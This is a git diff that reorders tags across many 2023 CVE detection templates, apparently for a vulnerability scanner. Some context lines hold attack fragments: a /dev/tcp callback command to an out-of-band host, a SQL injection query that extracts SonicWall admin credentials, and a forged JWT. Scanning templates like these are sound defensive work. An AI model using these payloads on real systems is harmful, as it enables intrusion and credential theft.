b/http/cves/2023/CVE-2023-33584.yaml index 6b885f9303..b9417de958 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: enrollment_system_project product: enrollment_system - tags: packetstorm,cve,cve2023,sqli,exploitdb,unauth,enrollment,enrollment_system_project + tags: cve2023,cve,packetstorm,sqli,exploitdb,unauth,enrollment,enrollment_system_project http: - raw: diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index 0df752c2c9..f54853a2c9 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -24,7 +24,7 @@ info: vendor: h3c product: magic_r300-2100m_firmware fofa-query: app="H3C-Ent-Router" - tags: cve,cve2023,router,rce,h3c + tags: cve2023,cve,router,rce,h3c variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 07e71937f1..1a61c05135 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -28,7 +28,7 @@ info: vendor: chamilo product: chamilo shodan-query: http.component:"Chamilo" - tags: cve,cve2023,chamilo,unauth,cmd,rce + tags: cve2023,cve,chamilo,unauth,cmd,rce http: - method: POST diff --git a/http/cves/2023/CVE-2023-34020.yaml b/http/cves/2023/CVE-2023-34020.yaml index b3deaca4d8..62cf6ff391 100644 --- a/http/cves/2023/CVE-2023-34020.yaml +++ b/http/cves/2023/CVE-2023-34020.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/uncanny-learndash-toolkit/" - tags: cve,cve2023,wordpress,uncanny-learndash-toolkit,wpscan,redirect + tags: cve2023,cve,wordpress,uncanny-learndash-toolkit,wpscan,redirect http: - method: GET diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 48cc8354f9..811a9b78b4 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -30,7 +30,7 @@ info: vendor: sonicwall product: analytics shodan-query: http.favicon.hash:-1381126564 - tags: cve,cve2023,sonicwall,shell,injection,auth-bypass,instrusive + tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" query: "' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '" diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 0ed3c11e41..d7842a81c3 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -28,7 +28,7 @@ info: vendor: kyocera product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 - tags: packetstorm,seclists,cve,cve2023,kyocera,lfi,printer + tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer http: - method: GET diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 09ac79e066..a0c57239ee 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -30,7 +30,7 @@ info: vendor: progress product: moveit_cloud shodan-query: http.favicon.hash:989289239 - tags: packetstorm,cve,cve2023,moveit,rce,sqli,intrusive,kev,progress + tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index 3ac1311c9e..fdafa1ac9b 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: digitaldruid product: hoteldruid - tags: cve,cve2023,hoteldrui,xss,authenticated,digitaldruid + tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid http: - raw: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index ab95f734a6..ed2ca9d0d2 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -29,7 +29,7 @@ info: product: "gibbon" shodan-query: http.favicon.hash:-165631681 fofa-query: icon_hash="-165631681" - tags: cve,cve2023,gibbon,lfi,gibbonedu + tags: cve2023,cve,gibbon,lfi,gibbonedu http: - method: GET diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 1857a317c4..4237d8b765 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -26,7 +26,7 @@ info: vendor: gibbonedu product: gibbon shodan-query: http.favicon.hash:-165631681 - tags: cve,cve2023,gibbon,xss,authenticated,intrusive,gibbonedu + tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu http: - raw: diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 9f1d3c5856..502a3b7780 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -26,7 +26,7 @@ info: vendor: jeecg product: jeecg_boot shodan-query: http.favicon.hash:1380908726 - tags: cve,cve2023,jeecg,sqli + tags: cve2023,cve,jeecg,sqli http: - raw: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 57153c0785..4f40cf505b 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -24,7 +24,7 @@ info: vendor: bloofox product: bloofoxcms fofa-query: "Powered by bloofoxCMS" - tags: cve,cve2023,sqli,bloofox,authenticated + tags: cve2023,cve,sqli,bloofox,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index baec900a98..a6c2e73294 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -28,7 +28,7 @@ info: vendor: hestiacp product: control_panel shodan-query: http.favicon.hash:-476299640 - tags: huntr,cve,cve2023,hestiacp,xss,intrusive + tags: cve2023,cve,huntr,hestiacp,xss,intrusive http: - method: GET diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index e04ca3a5fc..a4c249f5eb 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -26,7 +26,7 @@ info: vendor: traggo product: traggo shodan-query: html:"traggo" - tags: cve,cve2023,traggo,lfi,server + tags: cve2023,cve,traggo,lfi,server http: - method: GET diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index a1c000aaa1..e8728c3354 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -30,7 +30,7 @@ info: vendor: chamilo product: chamilo shodan-query: http.component:"Chamilo" - tags: packetstorm,cve,cve2023,chamilo + tags: cve,cve2023,packetstorm,chamilo http: - raw: diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 304e4b9c44..4429010821 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -28,7 +28,7 @@ info: product: endpoint_manager_mobile shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve,cve2023,ivanti,mobileiron,epmm + tags: cve2023,cve,ivanti,mobileiron,epmm http: - method: GET diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index a9e5b36004..fb66bb04f5 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -24,7 +24,7 @@ info: vendor: sitecore product: experience_commerce shodan-query: title:"Sitecore" - tags: cve,cve2023,sitecore,rce + tags: cve2023,cve,sitecore,rce variables: string: "{{rand_base(6)}}" payload: | diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index d312c77220..56458d4453 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -29,7 +29,7 @@ info: vendor: nocodb product: nocodb shodan-query: http.favicon.hash:-2017596142 - tags: cve,cve2023,nocodb,lfi + tags: cve2023,cve,nocodb,lfi http: - method: GET diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 261ded83b5..323215da68 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -29,7 +29,7 @@ info: vendor: mgt-commerce product: cloudpanel shodan-query: title:"Cloudpanel" - tags: cve,cve2023,cloudpanel,rce,instrusive,mgt-commerce + tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index 835f1ed97d..d18d2f8812 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -25,7 +25,7 @@ info: vendor: intelbras product: sg_2404_mr_firmware shodan-query: title:"Intelbras" - tags: cve,cve2023,intelbras,switch,exposure + tags: cve2023,cve,intelbras,switch,exposure http: - method: GET diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 058831dc9e..b50eba3bbf 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webkul product: qloapps - tags: cve,cve2023,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul http: - raw: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index bb8dc8850a..d0f15ec5ac 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webkul product: qloapps - tags: cve,cve2023,xss,webkul-qloapps,unauth,webkul + tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index 81f059effd..99d89b27bf 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: adiscon product: loganalyzer - tags: cve,cve2023,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer + tags: cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer http: - method: GET diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index da13af49ec..6eebcc2239 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: codekop product: codekop - tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth + tags: cve2023,cve,packetstorm,xss,pos,codekop,unauth http: - method: GET diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 9108eefadc..d77f653463 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -30,7 +30,7 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" - tags: packetstorm,cve,cve2023,juniper,php,rce,intrusive,fileupload,kev + tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev variables: value: "CVE-2023-36844" payload: "('')" diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 7a01387460..09b3da08a2 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -28,7 +28,7 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" - tags: packetstorm,cve,cve2023,rce,unauth,juniper,kev + tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 7f78150bb0..17453e5015 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -26,7 +26,7 @@ info: vendor: honeywell product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" - tags: cve,cve2023,honeywell,pm43,printer,iot,rce + tags: cve2023,cve,honeywell,pm43,printer,iot,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 0669b6e94b..d8328cee25 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -27,7 +27,7 @@ info: product: casaos shodan-query: http.html:"/CasaOS-UI/public/index.html" fofa-query: body="/CasaOS-UI/public/index.html" - tags: cve,cve2023,oss,casaos,jwt,icewhale + tags: cve2023,cve,oss,casaos,jwt,icewhale variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' jwt_token: '{{generate_jwt(jwt_data, "HS256")}}' diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 5e3354a688..3c6c403748 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -30,7 +30,7 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 - tags: cve,cve2023,piwigo,sqli,authenticated + tags: cve2023,cve,piwigo,sqli,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 89bdcd67b3..48030a4625 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -28,7 +28,7 @@ info: product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" - tags: cve,cve2023,xwiki,rce + tags: cve2023,cve,xwiki,rce http: - method: GET diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 890e3af93e..6985ee81af 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: copyparty_project product: copyparty - tags: packetstorm,cve,cve2023,traversal,copyparty,copyparty_project + tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index c6849e91f4..81d180b3c2 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -30,7 +30,7 @@ info: product: zimbra shodan-query: http.favicon.hash:475145467 fofa-query: icon_hash="475145467" - tags: cve,cve2023,zimbra,xss,authenticated,kev + tags: cve2023,cve,zimbra,xss,authenticated,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 8c6935563c..38e0f6b3e7 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system - tags: cve,cve2023,fileupload,rce,opms,intrusive + tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project http: - raw: diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index a815081248..3fd912dfbf 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -29,7 +29,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: cve,cve2023,mflow,lfi,huntr,lfprojects + tags: cve2023,cve,mflow,lfi,huntr,lfprojects http: - method: GET diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 2a379eee8a..3e85f063cd 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -25,7 +25,7 @@ info: vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: cve,cve2023,nextgen,rce + tags: cve2023,cve,nextgen,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index b1321983f3..9fb739990c 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -28,7 +28,7 @@ info: product: ninja_forms framework: wordpress publicwww-query: /wp-content/plugins/ninja-forms/ - tags: wpscan,packetstorm,cve,cve2023,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms + tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms http: - raw: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 27805e250c..f59063fffb 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -30,7 +30,7 @@ info: vendor: ivanti product: mobileiron_sentry shodan-query: 'html:"Note: Requires a local Sentry administrative user"' - tags: packetstorm,cve,cve2023,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast + tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index b1bfc03904..f7cf94576a 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -28,7 +28,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" - tags: cve,cve2023,adobe,auth-bypass,coldfusion,kev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index ed827351ae..e75356a7d3 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -28,7 +28,7 @@ info: product: smart_parking_management shodan-query: html:"/WPMS/asset" zoomeye-query: /WPMS/asset - tags: cve,cve2023,dahua,fileupload,intrusive,rce,dahuasecurity + tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 20d10187db..f99e22338d 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: cve,cve2023,xss,unauth,exploitdb,moodating,moosocial + tags: cve2023,cve,xss,unauth,exploitdb,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index fa77141dde..bc47a382e3 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -29,7 +29,7 @@ info: product: ip-he950e_firmware shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' max-req: 1 - tags: cve,cve2023,fujitsu,ip-series + tags: cve2023,cve,fujitsu,ip-series http: - raw: diff --git a/http/cves/2023/CVE-2023-3844.yaml b/http/cves/2023/CVE-2023-3844.yaml index e181ffa8f8..e062083750 100644 --- a/http/cves/2023/CVE-2023-3844.yaml +++ b/http/cves/2023/CVE-2023-3844.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index e0224d5afe..2beec15e70 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-3846.yaml b/http/cves/2023/CVE-2023-3846.yaml index cb4f2990a3..4d52419ed0 100644 --- a/http/cves/2023/CVE-2023-3846.yaml +++ b/http/cves/2023/CVE-2023-3846.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index c700233150..f7a728930e 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index 09fe4430f8..d99698fe06 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 501f09a36d..b08eaaf9cc 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moodating - tags: packetstorm,cve,cve2023,xss,unauth,moodating,moosocial + tags: cve2023,cve,packetstorm,xss,unauth,moodating,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 97d7006456..c702631f46 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -27,7 +27,7 @@ info: vendor: copyparty_project product: copyparty shodan-query: title:"copyparty" - tags: packetstorm,cve,cve2023,copyparty,xss,oss,copyparty_project + tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 3bd30b8f12..9c7e35fece 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -31,7 +31,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" - tags: cve,cve2023,metabase,oss,rce + tags: cve2023,cve,metabase,oss,rce variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 5bcda72f42..beb363c2b5 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -23,7 +23,7 @@ info: vendor: opnsense product: opnsense shodan-query: title:"OPNsense" - tags: cve,cve2023,opnsense,xss,authenticated,rce + tags: cve2023,cve,opnsense,xss,authenticated,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index d71cef55b3..b7b23fa75c 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -30,7 +30,7 @@ info: vendor: filemage product: filemage shodan-query: title:"FileMage" - tags: packetstorm,cve,cve2023,lfi,filemage + tags: cve2023,cve,packetstorm,lfi,filemage http: - method: GET diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 237f118c25..b29256e266 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: - raw: diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index 8b1de603d3..f3a010a3c4 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2023,rconfig,authenticated,ssrf,lfi + tags: cve2023,cve,rconfig,authenticated,ssrf,lfi http: - raw: diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index 21ce4b1d5d..0bd8e2d948 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2023,rconfig,authenticated,ssrf,lfr + tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: - raw: diff --git a/http/cves/2023/CVE-2023-39120.yaml b/http/cves/2023/CVE-2023-39120.yaml index 77564a2792..75601fef85 100644 --- a/http/cves/2023/CVE-2023-39120.yaml +++ b/http/cves/2023/CVE-2023-39120.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 1 shodan-query: title:"OpenWRT" - tags: cve,cve2023,lfi,openwrt,nodogsplash + tags: cve2023,cve,lfi,openwrt,nodogsplash http: - method: GET diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 97e55c6a66..28ba976556 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -28,7 +28,7 @@ info: vendor: ziahamza product: webui-aria2 shodan-query: title:"Aria2 WebUI" - tags: lfi,unauth,aria2,webui,ziahamza + tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza http: - method: GET diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index c40446bd2b..468ee95312 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -28,7 +28,7 @@ info: vendor: papercut product: papercut_mf shodan-query: html:"content="PaperCut"" - tags: cve,cve2023,lfi,papercut + tags: cve2023,cve,lfi,papercut http: - method: GET diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index a1b1558489..7d5841aa61 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -27,7 +27,7 @@ info: vendor: adenion product: blog2social framework: wordpress - tags: wpscan,cve,cve2023,wordpress,wp-plugin,xss,authenticated,adenion + tags: cve2023,cve,wpscan,wordpress,wp-plugin,xss,authenticated,adenion http: - raw: diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 035c9f2b4a..971a92b707 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -28,7 +28,7 @@ info: vendor: cacti product: cacti shodan-query: title:"Login to Cacti" - tags: cve,cve2023,cacti,sqli + tags: cve2023,cve,cacti,sqli http: - raw: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 0ecd618a76..35a7f3f792 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -27,7 +27,7 @@ info: vendor: icewarp product: webclient shodan-query: title:"icewarp" - tags: cve,cve2023,xss,icewarp + tags: cve2023,cve,xss,icewarp http: - method: GET diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index ca1a14ae7c..16bd657365 100644 --- 